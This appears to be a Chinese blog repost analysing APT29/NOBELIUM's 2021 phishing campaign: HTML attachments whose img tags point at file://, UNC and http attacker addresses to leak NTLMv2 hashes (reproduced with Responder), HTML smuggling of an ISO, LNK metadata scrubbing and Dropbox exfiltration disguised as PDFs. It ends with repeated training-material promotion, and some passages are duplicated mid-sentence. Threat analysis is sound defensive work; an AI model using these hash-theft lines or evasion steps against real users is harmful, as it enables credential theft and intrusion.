情报背景
SolarWinds供应链攻击事件在去年年底引起轩然大波,各安全厂商针对事件的供应链攻击阶段和后供应链攻击阶段进行了持续的技战术分析,并不断尝试对事件幕后的攻击者进行溯源与追踪分析。微软将SolarWinds事件的始作俑者命名为“NOBELIUM”,并对其进行长期的追踪与分析(https://aka.ms/nobelium)。
而近期微软再次捕获到了NOBELIUM组织的一系列邮件钓鱼攻击活动并发布了分析报告,对其攻击链和样本进行了深入分析。同时,除微软外的其他安全厂商也对该攻击活动进行了补充分析。本文将基于已有情报,对NOBELIUM组织的本次钓鱼邮件攻击所涉及的高水平攻击思路与技术进行分析还原。
组织名称
|
NOBELIUM
—|—
组织编号
|
APT29
关联组织
|
UNC2452,Dark Halo,The Dukes
相关工具
|
EnvyScout、BoomBox、NativeZone、VaporRage、Cobalt Strike
战术标签
|
初始访问 执行 持久化 防御规避 发现 横向移动 收集 命令与控制 数据回传
技术标签
|
间接命令执行、LOLBAS、HTML Smuggling、云存储
情报来源
|
https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-
based-attack-from-nobelium/
https://www.microsoft.com/security/blog/2021/05/28/breaking-down-nobeliums-
latest-early-stage-toolset/
https://www.volexity.com/blog/2021/05/27/suspected-apt29-operation-launches-
election-fraud-themed-phishing-campaigns/
攻击技术分析
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-T2MAM2mM-1692333872931)(https://image.3001.net/images/20210806/1628240097_610cf8e128f2317cfc044.png!small?1628240097347)]
亮点一:利用html图片外链实现NTLMv2 Hash窃取与访问探针
钓鱼邮件中的html附件包含了两条img标签外链,均会导致用户浏览器在尝试加载链接图片时去请求攻击者服务器。一方面,来自受害者客户端的网络请求可作为钓鱼探针,获取受害者IP、Useragent这类基础信息。另一方面使用外链进行网络请求可完成凭证窃取。
当用户浏览器试图加载以"file://"协议访问外部资源时,主机会尝试与服务器建立smb连接,并发送NTLMv2哈希到服务端进行认证。若服务端部署诸如Responder这样的恶意攻击工具便可以捕获到请求的NTLMv2哈希,之后就可利用john等工具对哈希进行暴力破解得到目标客户端用户的密码。与Microsoft报告中所认为http协议请求的部分仅用于探针访问的观点不同,http认证请求时同样可以导致NTLMv2哈希的泄露。
协议
|
嵌入方式
—|—
file协议(smb协议)
|
<img src=file://<dst_ip>/1.jpg>
http协议
|
<img src=http://<dst_ip>/1.jpg>
unc路径(smb协议)
|
<img src=\<dst_ip>\1.jpg>
省略协议头(与网站本身协议保持一致)
|
<img src=//<dst_ip>/1.jpg>
攻击复现
在linux系统中安装最新版Responder并启动监听。
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-14ralqaC-1692333872934)(https://image.3001.net/images/20210806/1628240146_610cf912a2881062ca0e5.png!small?1628240146922)]
在另一台Windows机器中构造类似的html文件,嵌入访问外部图片资源的链接。
通过smb协议抓取到的NTLMv2-SSP哈希。
通过http协议抓取到的NTLMv2哈希。
利用本地网页身份绕过浏览器安全限制
因为file协议在今天的站点中已经较少被用到,Chrome、Firefox与IE7之后版本的浏览器为了保证安全性会在以http协议访问的站点中禁止使用file协议请求外部服务器资源,这也是NOBELIUM选择使用html钓鱼附件插入图片外链的原因。
亮点二:本地Html Smuggling投递恶意ISO文件
Html
Smuggling指攻击者构造恶意的html5与javascript脚本,受害者使用浏览器访问HTML时会加载运行脚本代码并动态生成恶意文件投递到目标磁盘的行为。因文件完全在防火墙之后的客户端生成,无文件投递流量产生而完美规避了防火墙、全流量设备和沙箱的检测与阻断。NOBELIUM在本次行动中使用了FileSaver开源项目生成Html
Smuggling攻击代码并置于邮件HTML附件中。当受害者在浏览器中打开该HTML文件时会看到伪装的文件下载页面,该页面动态生成并自动下载恶意的iso文件,以网站文字内容诱导用户打开。
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Gl9MC4rZ-1692333872940)(https://image.3001.net/images/20210806/1628240458_610cfa4aef855b97acf0d.png!small?1628240459156)]
NOBELIUM在构造Hmtl
smuggling代码时,加入了执行环境的检测,利用js获取当前路径,仅当网页路径在C盘才会启动iso的生成与下载,这可能是为了对抗沙箱分析所采取的一种措施。
在最新版本的HTML样本中利用UserAgent对网页打开的浏览器环境进行了更多检测,若检测到HTML附件被手机浏览器打开时则跳转到攻击者指定的其他网站,若非Windows系统终端打开时则不进行下一步的ISO文件下载。这既避免了文件在其他操作系统上被下载而导致暴露的可能性,又可通过将受害者引导至新的站点来针对性地进行攻击。
亮点三:利用ISO文件作为载体,突破文件来源信任控制
对于从互联网下载的文件,Windows操作系统会在名为"Zone.Identifier"的NTFS备用数据流(ADS)中进行标记,被标记的文件在默认会受到一些安全策略的限制,例如在Office中打开从互联网侧下载的doc文档时会默认以只读视图打开并警告,SMART
Screeen筛选器也会对标记为来自互联网的未知可执行文件采取阻止执行策略。
为了避免被这种信任控制机制所限制,NOBELIUM采用了ISO镜像这种容器类文件进行投递。因为即便容器文件本身被打上标签,在被挂载后其中的文件也不会继承这种标记,而是被操作系统视作为本地文件。
另外在Win10等较新版本的操作系统中,iso文件被用户点击后将被自动挂载,并在新窗口中打开,隐藏文件等属性可以被完整的保留。NOBELIUM仅将恶意链接NV.lnk保持可见,而隐藏其他恶意内容,从而诱导用户点击最终的LNK文件。
亮点四:反溯源分析,清理lnk文件metadata
虽然LNK文件在邮件钓鱼中应用广泛,但是其自身带有的敏感元数据却可能成为溯源方的切入点,未经修改的lnk文件包含以下信息:
创建、修改、访问时间戳
磁盘序列号
磁盘名称
主机NetBIOS名称
主机Mac地址
使用来自Mitec公司的Windows File Analyzer等工具可从lnk文件中提取这些敏感信息以用于溯源追踪分析。
从文件结构的角度看,除时间戳信息保存在ShellLinkHeader段外,主机名等其他的敏感信息大多位于TrackerDataBlock结构部分。
本次攻击行动中NOBELIUM对构造的lnk文件metadata进行了抹除,有效避免了敏感信息泄露导致被溯源的风险。如下图所示ShellLinkHeader结构中,记录时间戳的部分已被抹除。
ExtraData段的TrackerDataBlock也做了同样的处理。
经过处理的lnk文件中也已不再包含敏感信息。
亮点五:精心构造的数据回传与上线过程
当用户点击打开LNK文件后,会执行rundll32启动Boom.exe下载器。启动后首先会打开ISO中正常的pdf文件,增强钓鱼附件的可信度。
Boom.exe还会在后台.完成对目标主机的信息收集 ,包括通过LDAP协议获取所有域内用户信息。
之后Boom.exe会将收集到的信息进行加密并添加与合法PDF一致的文件头与文件尾伪装为pdf文件。
最终利用web
api将伪造的pdf文件上传至NOBELIUM控制的DropBox网盘中,并从网盘拉取两个类似结构的pdf文件,再在本地进行解密,得到NativeCacheSvc.dll与CertPKIProvider.dll两个文件。通过伪装PDF文件的方式尽可能的规避了在信息回传阶段被流量审计的风险。
CertPKIProvider.dll在被加载执行之后会向受NOBELIUM控制的WordPress站点发起请求,将受害者用户名等信息回传并将受控主机标识为攻陷状态。
当NOBELIUM有意图对目标机器进行进一步的攻击时,则可在GET请求响应包中添加异或加密的shellcode,并由CertPKIProvider.dll在本地解密执行。
当NOBELIUM有意图对目标机器进行进一步的攻击时,则可在GET请求响应包中添加异或加密的shellcode,并由CertPKIProvider.dll在本地解密执行。
总结
1 信息收集与命令控制并重,各阶段完成必要的信息收集后再采取进一步行动。
2 利用容器文件绕过主机对互联网文件的标记,突破信任控制体系。
3 伪造为合法文件进行数据回传,规避流量监测。
4 用于回传流量与命令控制的攻击基础设施使用了被攻陷的合法网站,并仿照其业务特征进行通讯。
行进一步的攻击时,则可在GET请求响应包中添加异或加密的shellcode,并由CertPKIProvider.dll在本地解密执行。
总结
1 信息收集与命令控制并重,各阶段完成必要的信息收集后再采取进一步行动。
2 利用容器文件绕过主机对互联网文件的标记,突破信任控制体系。
3 伪造为合法文件进行数据回传,规避流量监测。
4 用于回传流量与命令控制的攻击基础设施使用了被攻陷的合法网站,并仿照其业务特征进行通讯。
题外话
初入计算机行业的人或者大学计算机相关专业毕业生,很多因缺少实战经验,就业处处碰壁。下面我们来看两组数据:
2023届全国高校毕业生预计达到1158万人,就业形势严峻;
国家网络安全宣传周公布的数据显示,到2027年我国网络安全人员缺口将达327万。
一方面是每年应届毕业生就业形势严峻,一方面是网络安全人才百万缺口。
6月9日,麦可思研究2023年版就业蓝皮书(包括《2023年中国本科生就业报告》《2023年中国高职生就业报告》)正式发布。
2022届大学毕业生月收入较高的前10个专业
本科计算机类、高职自动化类专业月收入较高。2022届本科计算机类、高职自动化类专业月收入分别为6863元、5339元。其中,本科计算机类专业起薪与2021届基本持平,高职自动化类月收入增长明显,2022届反超铁道运输类专业(5295元)排在第一位。
具体看专业,2022届本科月收入较高的专业是信息安全(7579元)。对比2018届,电子科学与技术、自动化等与人工智能相关的本科专业表现不俗,较五年前起薪涨幅均达到了19%。数据科学与大数据技术虽是近年新增专业但表现亮眼,已跻身2022届本科毕业生毕业半年后月收入较高专业前三。五年前唯一进入本科高薪榜前10的人文社科类专业——法语已退出前10之列。
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Td1FMUR2-1692333872957)(C:\Users\Administrator\AppData\Roaming\Typora\typora-user-images\image-20230809162658551.png)]
“没有网络安全就没有国家安全”。当前,网络安全已被提升到国家战略的高度,成为影响国家安全、社会稳定至关重要的因素之一。
网络安全行业特点
1、就业薪资非常高,涨薪快 2021年猎聘网发布网络安全行业就业薪资行业最高人均33.77万!
2、人才缺口大,就业机会多
2019年9月18日《中华人民共和国中央人民政府》官方网站发表:我国网络空间安全人才 需求140万人,而全国各大学校每年培养的人员不到1.5W人。猎聘网《2021年上半年网络安全报告》预测2027年网安人才需求300W,现在从事网络安全行业的从业人员只有10W人。
行业发展空间大,岗位非常多
网络安全行业产业以来,随即新增加了几十个网络安全行业岗位︰网络安全专家、网络安全分析师、安全咨询师、网络安全工程师、安全架构师、安全运维工程师、渗透工程师、信息安全管理员、数据安全工程师、网络安全运营工程师、网络安全应急响应工程师、数据鉴定师、网络安全产品经理、网络安全服务工程师、网络安全培训师、网络安全审计员、威胁情报分析工程师、灾难恢复专业人员、实战攻防专业人员…
职业增值潜力大
网络安全专业具有很强的技术特性,尤其是掌握工作中的核心网络架构、安全技术,在职业发展上具有不可替代的竞争优势。
随着个人能力的不断提升,所从事工作的职业价值也会随着自身经验的丰富以及项目运作的成熟,升值空间一路看涨,这也是为什么受大家欢迎的主要原因。
从某种程度来讲,在网络安全领域,跟医生职业一样,越老越吃香,因为技术愈加成熟,自然工作会受到重视,升职加薪则是水到渠成之事。
黑客&网络安全如何学习
今天只要你给我的文章点赞,我私藏的网安学习资料一样免费共享给你们,来看看有哪些东西。
1.学习路线图
行业发展空间大,岗位非常多
网络安全行业产业以来,随即新增加了几十个网络安全行业岗位︰网络安全专家、网络安全分析师、安全咨询师、网络安全工程师、安全架构师、安全运维工程师、渗透工程师、信息安全管理员、数据安全工程师、网络安全运营工程师、网络安全应急响应工程师、数据鉴定师、网络安全产品经理、网络安全服务工程师、网络安全培训师、网络安全审计员、威胁情报分析工程师、灾难恢复专业人员、实战攻防专业人员…
职业增值潜力大
网络安全专业具有很强的技术特性,尤其是掌握工作中的核心网络架构、安全技术,在职业发展上具有不可替代的竞争优势。
随着个人能力的不断提升,所从事工作的职业价值也会随着自身经验的丰富以及项目运作的成熟,升值空间一路看涨,这也是为什么受大家欢迎的主要原因。
从某种程度来讲,在网络安全领域,跟医生职业一样,越老越吃香,因为技术愈加成熟,自然工作会受到重视,升职加薪则是水到渠成之事。
黑客&网络安全如何学习
今天只要你给我的文章点赞,我私藏的网安学习资料一样免费共享给你们,来看看有哪些东西。
1.学习路线图
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-VarP189p-1692333872958)(C:\Users\Administrator\Desktop\网安思维导图\享学首创年薪40W+网络安全工程师 青铜到王者技术成长路线V4.0.png)]
攻击和防守要学的东西也不少,具体要学的东西我都写在了上面的路线图,如果你能学完它们,你去就业和接私活完全没有问题。
2.视频教程
网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。
内容涵盖了网络安全法学习、网络安全运营等保测评、渗透测试基础、漏洞详解、计算机基础知识等,都是网络安全入门必知必会的学习内容。
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-5p65Elh7-1692333872958)(C:\Users\Administrator\Desktop\网安资料截图\视频课件.jpeg)]
(都打包成一块的了,不能一一展开,总共300多集)
因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取
如果你对网络安全入门感兴趣,那么你需要的话可以点击这里👉网络安全重磅福利:入门&进阶全套282G学习资源包免费分享!
3.技术文档和电子书
技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。
因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取
如果你对网络安全入门感兴趣,那么你需要的话可以点击这里👉网络安全重磅福利:入门&进阶全套282G学习资源包免费分享!
4.工具包、面试题和源码
“工欲善其事必先利其器”我为大家总结出了最受欢迎的几十款款黑客工具。涉及范围主要集中在 信息收集、Android黑客工具、自动化工具、网络钓鱼等,感兴趣的同学不容错过。
还有我视频里讲的案例源码和对应的工具包,需要的话也可以拿走。
因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取
如果你对网络安全入门感兴趣,那么你需要的话可以点击这里👉网络安全重磅福利:入门&进阶全套282G学习资源包免费分享!
最后就是我这几年整理的网安方面的面试题,如果你是要找网安方面的工作,它们绝对能帮你大忙。
这些题目都是大家在面试深信服、奇安信、腾讯或者其它大厂面试时经常遇到的,如果大家有好的题目或者好的见解欢迎分享。
参考解析:深信服官网、奇安信官网、Freebuf、csdn等
内容特点:条理清晰,含图像化表示更加易懂。
内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…
因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取
如果你对网络安全入门感兴趣,那么你需要的话可以点击这里👉网络安全重磅福利:入门&进阶全套282G学习资源包免费分享!
3238
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
